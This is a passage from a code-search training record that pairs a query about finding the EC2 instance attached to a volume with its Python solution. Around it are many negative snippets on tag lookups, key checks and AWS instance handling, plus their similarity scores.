test_tag_valid_image(self):\n alpine = self.docker.images.get(constant.ALPINE)\n self.assertTrue(alpine.tag(\"demo\", constant.ALPINE_SHORTNAME))\n\n alpine = self.docker.images.get(constant.ALPINE)\n for tag in alpine.tags:\n self.assertIn(\"alpine\", tag)", "def IsImportant(self, key):\n\n if any(x.lower() == key for x in self.keywords):\n return True\n return False", "def record_application_tags(self) -> bool:\n return pulumi.get(self, \"record_application_tags\")", "def test_s3_bucket_exists(self) -> None:\n if self.prod_env:\n 
bucket_name = 'saints-xctf-credentials-prod'\n else:\n bucket_name = 'saints-xctf-credentials-dev'\n\n s3_bucket = self.s3.list_objects(Bucket=bucket_name)\n return s3_bucket.get('Name') == bucket_name", "def hasEmbedded(self, tag):\n if self.embeddedTags and self.embeddedTags[-1] == tag:\n return True\n else:\n return False", "def exists(self, key_name: str) -> bool:\n pass", "def __contains__(self, attr):\n return attr in self._config", "def __contains__(self, key):\n item = self._store.get(key)\n if not item:\n return False\n\n value, expires_at = item\n if expires_at and time.time() < expires_at:\n return False\n\n return True", "def contains(name, key):\n\n return get_component(CachingPackage.COMPONENT_NAME).contains(name, key)", "def is_new_variable_product(self):\n # ====================================================================#\n # Check if Inputs Contains Attributes\n if \"attributes\" not in self._in.keys() or not isinstance(self._in[\"attributes\"], dict):\n return False\n return True", "def contains_key(self, key):\r\n\t\t# call the linked list contains() method for each bucket\r\n\t\tfor i in self._buckets:\r\n\t\t\tif i.contains(key):\r\n\t\t\t\treturn True\r\n\t\treturn False", "def hasTagValue(fluiddb, objectId, path):\n return fluiddb.objects[objectId][path].head()" ]
[ "0.63550603", "0.60692143", "0.59001714", "0.586084", "0.5793219", "0.57157636", "0.56831205", "0.56796306", "0.566162", "0.5619104", "0.5589269", "0.5552662", "0.55072737", "0.5455847", "0.5455847", "0.544153", "0.5431722", "0.54038215", "0.5395981", "0.5394134", "0.5378807", "0.53780603", "0.5374979", "0.5373266", "0.53722644", "0.53570455", "0.5352436", "0.53460425", "0.5342837", "0.5340622", "0.5338839", "0.53374827", "0.5313049", "0.52810174", "0.5279764", "0.52449846", "0.52293044", "0.5187206", "0.518672", "0.5178629", "0.5167262", "0.51554966", "0.51177853", "0.51163393", "0.5114046", "0.5106265", "0.51029736", "0.5100969", "0.5093931", "0.5090321", "0.50855863", "0.5081231", "0.507864", "0.5076453", "0.5076025", "0.5075293", "0.5071693", "0.50715953", "0.5064303", "0.50589776", "0.50574577", "0.5054578", "0.5054123", "0.5054056", "0.50507057", "0.5050696", "0.50461185", "0.5043527", "0.50432897", "0.5042496", "0.50410885", "0.5029958", "0.5029724", "0.50226116", "0.50226116", "0.50225914", "0.5021813", "0.50214624", "0.50209713", "0.5014762", "0.5009079", "0.4995438", "0.49940133", "0.49882472", "0.49860114", "0.49845234", "0.49836278", "0.49780276", "0.49764484", "0.49736336", "0.49701768", "0.49667004", "0.49612775", "0.49606255", "0.49597788", "0.49572852", "0.49450034", "0.4944589", "0.49438497", "0.49418318" ]
0.7877264
0
Name is a tag that might not exist, but if it does, it's very helpful for users to identify their resources
def get_name_tag(obj): if 'Name' in obj.tags: return obj.tags['Name'] else: return ""
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def wantsNametag(self):\n return 0", "def get_name_tag(obj):\n if 'Name' in obj.tags:\n return obj.tags['Name']\n else:\n return \"\"", "def tag(self) -> str:\n return self.name or ''", "def tag(self,name):\n return self._tags.get(name,None)", "def name_key(tags):\r\n if 'name' not in tags:\r\n return None\r\n \r\n if not tags['name']:\r\n return None\r\n \r\n return (tags['name'], )", "def tag(request, tag_name):\n raise NotImplementedError", "def get_tag_name(self):\n\n pass", "def test_get_tag_name(self):\r\n name = self.combinedoe.get_tag_name(\"<t>Tag</t>\")\r\n self.assertEqual(name, \"t\")", "def tag_name(self) -> str:\n return pulumi.get(self, \"tag_name\")", "def name(self) -> Optional[str]:\n ...", "def name(self, name):\n pass", "def name_tag(resource_name):\n return Join(\"\", [Ref('AWS::StackName'), '-', resource_name])", "def getName():", "def getName():", "def getName():", "def getName():", "def getName():", "def getName():", "def _issingleton(self, tagname):\n return self.shortempty", "def test_name_tags():\n road = query_row(db_conf, 'osm_roads', 1101)\n assert road['name'] == 'name', road\n assert road['name:de'] == 'name:de', road\n assert road['name_en'] == 'name:en', road", "def tag_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"tag_name\")", "def _check_name(self):\n\t\tpass", "def has_name(self, name: str) -> bool:\n return name in self.child_tags", "def check_tag(obj, tag_name):\n rfctag = None\n if obj.get('Tags'):\n for tag in obj.get('Tags'):\n if tag.get('Key') == tag_name:\n tag_value = tag.get('Value')\n tag_value = re.sub('[,]', '/', tag_value)\n return tag_value\n continue\n if not rfctag:\n return str(\"no-record\")", "def get_name():", "def name():\n pass", "def name():\n pass", "def tag(self,name):\n try:\n return self.doc.getElementsByTagName(name)[0].firstChild.wholeText\n except IndexError:\n # Check for a hash tag with legacy API\n if name in ['md5','sha1','sha256']:\n for e in self.doc.getElementsByTagName('hashdigest'):\n if e.getAttribute('type').lower()==name:\n return e.firstChild.wholeText\n raise KeyError,name+\" not in XML\"", "def get_name(self):\n return self.tagnode", "def __get_tags(self, name):\n return Tags(\n Environment=\"ApiDev\",\n Name=\"ApiDev-Dev-\"+name,\n Owner=\"Foo industries\",\n Service=\"ServiceVPC\",\n VPC=\"Dev\",\n )", "def get_tag(self, name: str) -> Tag:\n if not name:\n raise TypeError(\"The given tag name is illegal\")\n\n try:\n tag = next(self._generate_tags(name))\n except StopIteration as error:\n raise ResourceNotExistError(resource=\"tag\", identification=name) from error\n\n return tag", "def name(self):\r\n return None", "def tag_uri(self, name):\n return 'tag:%s,%d:%s' % (self.DOMAIN, datetime.datetime.now().year, name)", "def tags():", "def __getitem__(self, name):\n tag = self._find(name)\n if tag is not None:\n return tag.text\n raise KeyError(name)", "def get_name(self):\n return None", "def get_tag(self, tag_name):\n tag_data = self.db.make_query(\n '''\n select tag_name from tag where tag_name = \"{}\"\n '''.format(tag_name)\n )\n\n if len(tag_data) > 0:\n tag_name = tag_data[0][0]\n human_readable_tag = name_util.make_decoded(tag_data[0][0])\n\n rtn_dict = {\n 'tag_name': tag_name,\n 'human_readable_name': human_readable_tag\n }\n\n return rtn_dict", "def name(self):\n return None", "def hasname(self):\n\t\treturn self.name is not None", "def get_name(self):", "def get_name(self):", "def __unicode__(self):\n return self.tag_name", "def name():\n raise NotImplementedError", "def 
name():\n raise NotImplementedError", "def name(self) -> str:\n ...", "def name(self) -> str:\n ...", "def name(self) -> str | None:\n pass", "def name(self):\r\n pass", "def name(self):\n pass", "def name(self):\n return NotImplemented", "def name(self) -> str: # pragma: no cover", "def name(self, name):\n return self.name", "def getName(self):", "def get_name(self):\n pass", "def get_name(self):\n pass", "def has_name(self):\n return self.name is not None", "def get_tagname(tags, tagid):\n for tag in tags:\n if tag['id'] == tagid:\n return tag['name']", "def getName(self, html):\n soup = bs(html, \"lxml\")\n results = soup.findAll(\"h1\", {\"data-reactid\" : \"7\"})\n if len(results) != 1:\n return False, None\n name = results[0].text.split(' (')[0]\n return True, name", "def tag(self, tag_name):\r\n return Tag(self, tag_name)", "def _tag_of(entry: _LexiconEntry) -> str:\n return entry[\"tag\"].upper()", "def get_tag_name(self, xml):\r\n tag = etree.fromstring(xml).tag\r\n return tag", "def name(self):\n ...", "def _add_tag(self, tag_name):\n tag = TagInfo()\n tag._name = tag_name\n self._tags.append(tag)\n return tag", "def name(self):\n raise NotImplementedError # pragma: no cover", "def get_tag(self, tag_name):\n if not tag_name:\n return None\n for tag in self._tags:\n if tag._name == tag_name:\n return tag\n pass\n new_tag = self._add_tag(tag_name)\n return new_tag", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def remove_tag(self, name):\n eh = SimpleErrorHandler()\n\n self._client.execute('tag', name, remove=True, eh=eh)\n\n return bool(eh)", "def getName(self):\n return \"\"", "def make_name_unique(xml_data):\r\n # VS[compat]. Take this out once course conversion is done (perhaps leave the uniqueness check)\r\n\r\n # tags that really need unique names--they store (or should store) state.\r\n need_uniq_names = ('problem', 'sequential', 'video', 'course', 'chapter',\r\n 'videosequence', 'poll_question', 'vertical')\r\n\r\n attr = xml_data.attrib\r\n tag = xml_data.tag\r\n id = lambda x: x\r\n # Things to try to get a name, in order (key, cleaning function, remove key after reading?)\r\n lookups = [('url_name', id, False),\r\n ('slug', id, True),\r\n ('name', Location.clean, False),\r\n ('display_name', Location.clean, False)]\r\n\r\n url_name = None\r\n for key, clean, remove in lookups:\r\n if key in attr:\r\n url_name = clean(attr[key])\r\n if remove:\r\n del attr[key]\r\n break\r\n\r\n def looks_like_fallback(url_name):\r\n \"\"\"Does this look like something that came from fallback_name()?\"\"\"\r\n return (url_name is not None\r\n and url_name.startswith(tag)\r\n and re.search('[0-9a-fA-F]{12}$', url_name))\r\n\r\n def fallback_name(orig_name=None):\r\n \"\"\"Return the fallback name for this module. 
This is a function instead of a variable\r\n because we want it to be lazy.\"\"\"\r\n if looks_like_fallback(orig_name):\r\n # We're about to re-hash, in case something changed, so get rid of the tag_ and hash\r\n orig_name = orig_name[len(tag) + 1:-12]\r\n # append the hash of the content--the first 12 bytes should be plenty.\r\n orig_name = \"_\" + orig_name if orig_name not in (None, \"\") else \"\"\r\n xml_bytes = xml.encode('utf8')\r\n return tag + orig_name + \"_\" + hashlib.sha1(xml_bytes).hexdigest()[:12]\r\n\r\n # Fallback if there was nothing we could use:\r\n if url_name is None or url_name == \"\":\r\n url_name = fallback_name()\r\n # Don't log a warning--we don't need this in the log. Do\r\n # put it in the error tracker--content folks need to see it.\r\n\r\n if tag in need_uniq_names:\r\n error_tracker(\"PROBLEM: no name of any kind specified for {tag}. Student \"\r\n \"state will not be properly tracked for this module. Problem xml:\"\r\n \" '{xml}...'\".format(tag=tag, xml=xml[:100]))\r\n else:\r\n # TODO (vshnayder): We may want to enable this once course repos are cleaned up.\r\n # (or we may want to give up on the requirement for non-state-relevant issues...)\r\n # error_tracker(\"WARNING: no name specified for module. xml='{0}...'\".format(xml[:100]))\r\n pass\r\n\r\n # Make sure everything is unique\r\n if url_name in self.used_names[tag]:\r\n # Always complain about modules that store state. If it\r\n # doesn't store state, don't complain about things that are\r\n # hashed.\r\n if tag in need_uniq_names:\r\n msg = (\"Non-unique url_name in xml. This may break state tracking for content.\"\r\n \" url_name={0}. Content={1}\".format(url_name, xml[:100]))\r\n error_tracker(\"PROBLEM: \" + msg)\r\n log.warning(msg)\r\n # Just set name to fallback_name--if there are multiple things with the same fallback name,\r\n # they are actually identical, so it's fragile, but not immediately broken.\r\n\r\n # TODO (vshnayder): if the tag is a pointer tag, this will\r\n # break the content because we won't have the right link.\r\n # That's also a legitimate attempt to reuse the same content\r\n # from multiple places. Once we actually allow that, we'll\r\n # need to update this to complain about non-unique names for\r\n # definitions, but allow multiple uses.\r\n url_name = fallback_name(url_name)\r\n\r\n self.used_names[tag].add(url_name)\r\n xml_data.set('url_name', url_name)", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def isNameUsed(self, name: unicode, startId: long, stopId: long) -> bool:\n ...", "def is_real_name(name):\n return name.strip(\"<> \") in names_set", "def is_real_name(name):\n return name.strip(\"<> \") in names_set", "def test_invalid_as_name(self):\n\n def make_bad_tag():\n class BadTag(ttag.helpers.AsTag):\n as_ = ttag.Arg(named=True)\n\n self.assertRaises(template.TemplateSyntaxError, make_bad_tag)", "def _clean_tag(name):\n # In the past, the first argument to summary ops was a tag, which allowed\n # arbitrary characters. Now we are changing the first argument to be the node\n # name. 
This has a number of advantages (users of summary ops now can\n # take advantage of the tf name scope system) but risks breaking existing\n # usage, because a much smaller set of characters are allowed in node names.\n # This function replaces all illegal characters with _s, and logs a warning.\n # It also strips leading slashes from the name.\n if name is not None:\n new_name = _INVALID_TAG_CHARACTERS.sub('_', name)\n new_name = new_name.lstrip('/') # Remove leading slashes\n if new_name != name:\n logging.warning('Summary name %s is illegal; using %s instead.', name, new_name)\n name = new_name\n return name", "def tag(self) -> str:\n return pulumi.get(self, \"tag\")", "def looks_like_fallback(url_name):\r\n return (url_name is not None\r\n and url_name.startswith(tag)\r\n and re.search('[0-9a-fA-F]{12}$', url_name))", "def _key_from_context(self, ctx, tag_name):\n tag_context = self.get_tag_context(ctx, tag_name)\n if tag_context:\n if tag_context == \"global\":\n return \"config:tags:global\"\n elif tag_context == \"chan\":\n return \"chan:{}:tags\".format(ctx.message.channel.id)\n elif tag_context == \"guild\":\n return \"guild:{}:tags\".format(ctx.message.guild.id)\n else:\n return None", "def check_name(self, node):\n assert \"name\" in node, \"Package node does not contain attribute 'node'\"\n assert len(node[\"name\"]) >= 1, \"Expecting at least one 'name' value\"\n # TODO: add more thorough checks", "def get_tag(tag_name, tag_list):\n for i in range(len(tag_list)):\n if tag_name == str(tag_list[i]):\n return tag_list[i]", "def get_name(self): \r\n return self.name", "def get_nametag(nametag):\n # start must be valid\n if not nametag.startswith(Tags.NAMETAG_START.value):\n return None\n\n # removes the start of the tag\n nametag = nametag[len(Tags.NAMETAG_START.value):]\n\n # end must be valid\n if not nametag.endswith(Tags.NAMETAG_END.value):\n return None\n\n # removes the end of the tag\n nametag = nametag[:(len(nametag) - len(Tags.NAMETAG_END.value))]\n\n # no empty nametags\n if nametag == \"\":\n return None\n\n # checks that every single character is valid\n for c in nametag:\n if (not is_letter(c) and\n not is_number(c) and\n c != \"-\" and c != \"_\" and c != \"'\"):\n return None\n return nametag", "def get_name(self):\r\n raise NotImplementedError", "def name(self):\n raise NotImplementedError()", "def name(self):\n raise NotImplementedError()", "def tag_cmd(context, json, name):\n store: Store = context.obj[\"store\"]\n LOG.info(\"Fetch tags\")\n tag_objs = store.get_tags()\n template = schema.TagSchema()\n result = []\n for tag_obj in tag_objs:\n if name and (tag_obj.name not in name):\n continue\n LOG.debug(\"Use tag %s\", tag_obj.name)\n result.append(template.dump(tag_obj))\n if not result:\n LOG.info(\"Could not find any of the specified tags [%s]\", \", \".join(name))\n return\n if json:\n click.echo(jsonlib.dumps(result))\n return\n console = Console()\n console.print(get_tags_table(result))", "def get_name() -> str:\n pass" ]
[ "0.72620493", "0.7172717", "0.6880746", "0.682264", "0.681301", "0.67561567", "0.6694516", "0.6682618", "0.65618443", "0.6456841", "0.6435155", "0.63498676", "0.6329023", "0.6329023", "0.6329023", "0.6329023", "0.6329023", "0.6329023", "0.6262894", "0.62420034", "0.62270963", "0.62159365", "0.62100595", "0.6207879", "0.6119206", "0.60893404", "0.60893404", "0.608547", "0.60798967", "0.6067325", "0.6011586", "0.60090137", "0.59653234", "0.5960306", "0.5956636", "0.595395", "0.59352833", "0.59337014", "0.5933172", "0.5909584", "0.5909584", "0.5901306", "0.5897426", "0.5897426", "0.58871156", "0.58871156", "0.58807606", "0.58764577", "0.5875089", "0.5872424", "0.5858052", "0.5846649", "0.58400524", "0.58396375", "0.58396375", "0.58201104", "0.5815103", "0.58134806", "0.5807338", "0.5806834", "0.5797786", "0.579517", "0.57902384", "0.5785006", "0.5784597", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.5766424", "0.57629794", "0.5757467", "0.57534164", "0.57534164", "0.57534164", "0.57534164", "0.57534164", "0.5750906", "0.57463795", "0.57463795", "0.5745676", "0.5741005", "0.57337385", "0.57275176", "0.5726109", "0.5723933", "0.5720795", "0.5714543", "0.5708467", "0.5707089", "0.5693878", "0.5693878", "0.5682709", "0.5682478" ]
0.7165239
2
Returns the actual instance (if only instance_id is needed, can access directly from volume) (if KEEP tag is needed, maybe it's better to grab it from a local dictionary list of instances)
def getInstanceOf(volume):
    # ughhhhhhhh refactor later (shouldn't do this for every single volume, takes forever)
    creds = credentials()
    conn = ec2.connect_to_region(volume.region.name, **creds)
    ins_id = volume.attach_data.instance_id
    reservation = conn.get_all_instances(instance_ids=ins_id)[0]
    return reservation.instances[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_instance(self, instance_id):\n return self.instances.get(instance_id)", "def get_instance_OLD (self):\n instances = self.data['instances']\n if not len(instances) == 1:\n raise Exception, \"ArchivalObject: %d Instances found\" % len(instances)\n return instances[0]", "def get_instance (self):\n instances = self.data['instances']\n if not len(instances):\n raise Exception, \"ArchivalObject: No Instances found\"\n for instance in instances:\n # print json.dumps(instance, indent=3)\n try:\n instance['sub_container']['top_container']\n return instance\n except:\n pass\n return None", "def get_instance(self, instance):\n return self._get(_instance.Instance, instance)", "def get_instance(self, db):\n table = db.metadata.tables['Instances']\n c_instance = table.c['instance']\n c_id = table.c['idInstance']\n # get prefix\n instance_header = db.session.connection().execute(select([func.substring(c_instance, 1, 4)],\n c_id == self.idInstance).select_from(\n table)).first()[0]\n data_length = db.session.connection().execute(select([func.length(c_instance)],\n c_id == self.idInstance).select_from(\n table)).first()[0]\n if data_length > 32 * 1024 * 1024:\n return \"Instance too large for processing. Please use the EDACC GUI application.\"\n if instance_header == 'LZMA': # compressed instance?\n # get blob without LZMA prefix\n instance_blob = db.session.connection().execute(select([func.substring(c_instance, 5)],\n c_id == self.idInstance).select_from(\n table)).first()[0]\n return utils.lzma_decompress(instance_blob)\n else:\n return self.instance", "def get_instance(instance):\n command = 'nova show %s' % instance\n return parse_output(Popen(command.split(), stdout=STDOUT,\n stderr=STDERR).communicate()[0])", "def find_instance_by_id ( ec2_conn, instance_id ) :\n instance_results = ec2_conn.get_only_instances( instance_ids = [ instance_id ] )\n if len( instance_results ) > 0 :\n return instance_results[ 0 ]\n\n return None", "def get_instance(tag):\n ec2 = boto.ec2.connect_to_region(AWS_REGION)\n reservations = ec2.get_all_instances()\n for res in reservations:\n for inst in res.instances:\n if \"tag\" in inst.tags.keys():\n if inst.tags[\"tag\"] == tag and inst.state == \"running\":\n #print \"Found %s\"%tag\n return inst\n print \"Couldn't find instance\"\n return None", "def _get_instance_id(self):\n return self.__instance_id", "def instance(self) -> str:\n return pulumi.get(self, \"instance\")", "def instance(self) -> str:\n return pulumi.get(self, \"instance\")", "def get_low_use_instance(self, instance_id):\n key = {\"InstanceID\": instance_id}\n return self.low_use.get_item(Key=key)", "def GetInstance(self, instance, reason=None):\n query = []\n _AppendReason(query, reason)\n\n return self._SendRequest(HTTP_GET,\n (\"/%s/instances/%s\" %\n (GANETI_RAPI_VERSION, instance)), query, None)", "def find_instance_by_type ( ec2_conn, base_name, instance_type ) :\n instance_name = get_instance_name( base_name, instance_type )\n instance_results = ec2_conn.get_only_instances( filters = { \"tag:Name\": [ instance_name ] } )\n if len( instance_results ) > 0 :\n return instance_results[ 0 ]\n\n return None", "def get_instance_id(self):\n return self.instance_id", "def instance(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance\")", "def get_instance_id():\n global _instance_id\n if _instance_id == '__unset':\n try:\n _instance_id = _fetch_instance_id()\n except IOError:\n log.exception(\"Exception retrieving InstanceId\")\n _instance_id = None\n\n return _instance_id", 
"def get_instance(self, instance):\n\n title = list(instance.keys())[0]\n instance = instance.get(title)\n return instance", "def get_instance(self, name):\n return self.store.instance.id", "def get_instance_info(inst):\n instance_info = {'id': inst.id,\n 'private_ip': inst.inner_ip_address,\n 'public_ip': inst.public_ip_address,\n 'image_id': inst.image_id,\n 'zone_id': inst.zone_id,\n 'region_id': inst.region_id,\n 'launch_time': inst.creation_time,\n 'instance_type': inst.instance_type,\n 'state': inst.state,\n 'tags': inst.tags,\n # 'groups': dict((group.id, group.name) for group in inst.groups),\n # 'groups': dict((group, group) for group in inst.groups),\n 'vpc_id': inst.vpc_id,\n 'subnet_id': inst.subnet_id,\n 'vpc_private_ip': inst.vpc_private_ip,\n 'eip': inst.eip,\n 'io_optimized': inst.io_optimized\n }\n try:\n bdm_dict = {}\n bdm = getattr(inst, 'block_device_mapping')\n for device_name in bdm.keys():\n bdm_dict[device_name] = {\n 'status': bdm[device_name].status,\n 'volume_id': bdm[device_name].volume_id,\n 'delete_on_termination': bdm[device_name].delete_on_termination\n }\n instance_info['block_device_mapping'] = bdm_dict\n except AttributeError:\n instance_info['block_device_mapping'] = False\n\n return instance_info", "def instance(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"instance\")", "def instance(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance\")", "def instance_id(self) -> str:\n return pulumi.get(self, \"instance_id\")", "def get_self_instance_id():\n\n logging.debug('get_self_instance_id()')\n response = urllib2.urlopen('http://169.254.169.254/1.0/meta-data/instance-id')\n instance_id = response.read()\n return instance_id", "def get_instance(self, instance_id, **kwargs):\r\n\r\n if 'mask' not in kwargs:\r\n items = [\r\n 'id',\r\n 'globalIdentifier',\r\n 'fullyQualifiedDomainName',\r\n 'hostname',\r\n 'domain',\r\n 'createDate',\r\n 'modifyDate',\r\n 'provisionDate',\r\n 'notes',\r\n 'dedicatedAccountHostOnlyFlag',\r\n 'privateNetworkOnlyFlag',\r\n 'primaryBackendIpAddress',\r\n 'primaryIpAddress',\r\n '''networkComponents[id, status, speed, maxSpeed, name,\r\n macAddress, primaryIpAddress, port,\r\n primarySubnet]''',\r\n 'lastKnownPowerState.name',\r\n 'powerState',\r\n 'status',\r\n 'maxCpu',\r\n 'maxMemory',\r\n 'datacenter',\r\n 'activeTransaction[id, transactionStatus[friendlyName,name]]',\r\n 'lastOperatingSystemReload.id',\r\n 'blockDevices',\r\n 'blockDeviceTemplateGroup[id, name, globalIdentifier]',\r\n 'postInstallScriptUri',\r\n 'userData',\r\n '''operatingSystem[passwords[username,password],\r\n softwareLicense.softwareDescription[\r\n manufacturer,name,version,\r\n referenceCode]]''',\r\n 'hourlyBillingFlag',\r\n 'billingItem.recurringFee',\r\n 'tagReferences[id,tag[name,id]]',\r\n 'networkVlans[id,vlanNumber,networkSpace]',\r\n ]\r\n kwargs['mask'] = \"mask[%s]\" % ','.join(items)\r\n\r\n return self.guest.getObject(id=instance_id, **kwargs)", "def get_app_instance_obj(self, instance_id, instance_alias=None):\n try:\n if instance_id:\n return filter(lambda app_inst: app_inst.id == instance_id, self.app_instances)[0]\n elif instance_alias:\n return filter(lambda app_inst: app_inst.alias == instance_alias, self.app_instances)[0]\n except:\n return None", "def run_instance():\n ami_id = \"ami-04876f29fd3a5e8ba\" # AMI Id\n instance_type = \"t2.micro\" # Instance Type\n tag_specs = [\n {\n 'ResourceType': 'instance',\n 'Tags': [\n {\n 'Key': 'Name',\n 'Value': 'BoB10@ProductDev.sdk.8084'\n }\n ]\n }\n ]\n\n # Instantiate 
the service resource object\n ec2_resource = session.resource('ec2', region_name=region)\n # Run an instance\n\n instances = ec2_resource.create_instances(ImageId=ami_id, InstanceType=instance_type,\n MaxCount=1, MinCount=1, KeyName='BoB10@ProductDev.8084',\n TagSpecifications=tag_specs, \n SecurityGroupIds=['sg-06b757b4bb272d98f'],\n UserData=assemble_userdata().as_string())\n Instance_id = instances[0].id\n print('\\nInstance Id: ' + Instance_id)\n print('Image Id: ' + instances[0].image_id)\n print('Instance Type: ' + instances[0].instance_type)\n print('State: ' + instances[0].state['Name'])\n return Instance_id", "def _get_instance(self):\n #return '_earth_instance_' + rospy.get_name().strip('/')\n return self.instance", "def find_by_instance_id(self, instance_id: str) -> Optional[StorageObject]:\n return self._store.get(instance_id, None)", "def get_instance(self, zone, instance, fields=None):\n assert is_valid_zone(zone), zone\n assert is_valid_instance(instance), instance\n try:\n return self.call_api(\n '/zones/%s/instances/%s' % (zone, instance),\n params={'fields': ','.join(fields)} if fields else None)\n except net.NotFoundError: # pragma: no cover\n return None", "def GetInstance(\n self,\n instance_name: str,\n resource_group_name: Optional[str] = None) -> 'AZComputeVirtualMachine':\n instances = self.ListInstances(resource_group_name=resource_group_name)\n if instance_name not in instances:\n raise errors.ResourceNotFoundError(\n 'Instance {0:s} was not found in subscription {1:s}'.format(\n instance_name, self.az_account.subscription_id), __name__)\n return instances[instance_name]", "def find_instance(self, name_or_id, ignore_missing=True):\n return self._find(\n _instance.Instance, name_or_id, ignore_missing=ignore_missing\n )", "def get_tag_for_instance(self, instance_id, tag_key):\n tags = self.get_tags_for_instance(instance_id)\n for tag in tags:\n if tag['Key'] == tag_key:\n return tag['Value']\n return None", "def _create_instance(cls, hook: EC2Hook):\n conn = hook.get_conn()\n try:\n ec2_client = conn.meta.client\n except AttributeError:\n ec2_client = conn\n\n # We need existed AMI Image ID otherwise `moto` will raise DeprecationWarning.\n images = ec2_client.describe_images()[\"Images\"]\n response = ec2_client.run_instances(MaxCount=1, MinCount=1, ImageId=images[0][\"ImageId\"])\n return response[\"Instances\"][0][\"InstanceId\"]", "def source_instance(self) -> 'outputs.InstanceReferenceResponse':\n return pulumi.get(self, \"source_instance\")", "def instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"instance_id\")", "def instance(self):\n return self._instance", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def find_vcs_instance_ept(self, country, 
amazon_seller, instance_dict):\n instance_obj = self.env['amazon.instance.ept']\n instance = instance_obj.browse( \\\n instance_dict.get((country.id, amazon_seller.id), False))\n if not instance:\n instance = amazon_seller.instance_ids.filtered( \\\n lambda x: x.country_id.id == country.id)\n if instance:\n instance_dict.update( \\\n {(country.id, amazon_seller.id): instance.id})\n return instance", "def show_instance(name, session=None, call=None):\n if call == \"function\":\n raise SaltCloudException(\n \"The show_instnce function must be called with -a or --action.\"\n )\n log.debug(\"show_instance-> name: %s session: %s\", name, session)\n if session is None:\n session = _get_session()\n vm = _get_vm(name, session=session)\n record = session.xenapi.VM.get_record(vm)\n if not record[\"is_a_template\"] and not record[\"is_control_domain\"]:\n try:\n base_template_name = record[\"other_config\"][\"base_template_name\"]\n except Exception: # pylint: disable=broad-except\n base_template_name = None\n log.debug(\n \"VM %s, does not have base_template_name attribute\",\n record[\"name_label\"],\n )\n ret = {\n \"id\": record[\"uuid\"],\n \"image\": base_template_name,\n \"name\": record[\"name_label\"],\n \"size\": record[\"memory_dynamic_max\"],\n \"state\": record[\"power_state\"],\n \"private_ips\": get_vm_ip(name, session),\n \"public_ips\": None,\n }\n\n __utils__[\"cloud.cache_node\"](ret, _get_active_provider_name(), __opts__)\n return ret", "def instance_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"instance_id\")", "def get_instance(self, node_id: str) -> \"GCPNode\":\n return", "def instance_id(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"instance_id\")", "def instance_spec(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"instance_spec\")", "def describe_instance(instance_id):\n # Instantiate the service resource object\n ec2_resource = session.resource('ec2', region_name=region)\n try:\n # Describe an instance\n instance = ec2_resource.Instance(instance_id)\n print('\\nInstance Id: ' + instance_id)\n print('Instance Id: ' + instance.id)\n print('Image Id: ' + instance.image_id)\n print('Instance Type: ' + instance.instance_type)\n print('State: ' + instance.state['Name'])\n if instance.state['Name'] == 'running':\n print('Private DNS Name: ' + instance.private_dns_name)\n print('Private IP: ' + instance.private_ip_address)\n print('Public DNS Name: ' + instance.public_dns_name)\n print('Public IP: ' + instance.public_ip_address)\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == \"MissingParameter\":\n print(\"Error: Missing instance id!!\")\n else:\n raise\n return", "def _get_marker_instance(ctx, marker):\n\n try:\n im = objects.InstanceMapping.get_by_instance_uuid(ctx, marker)\n except exception.InstanceMappingNotFound:\n raise exception.MarkerNotFound(marker=marker)\n\n elevated = ctx.elevated(read_deleted='yes')\n with context.target_cell(elevated, im.cell_mapping) as cctx:\n try:\n db_inst = db.instance_get_by_uuid(cctx, marker,\n columns_to_join=[])\n except exception.InstanceNotFound:\n db_inst = None\n if not 
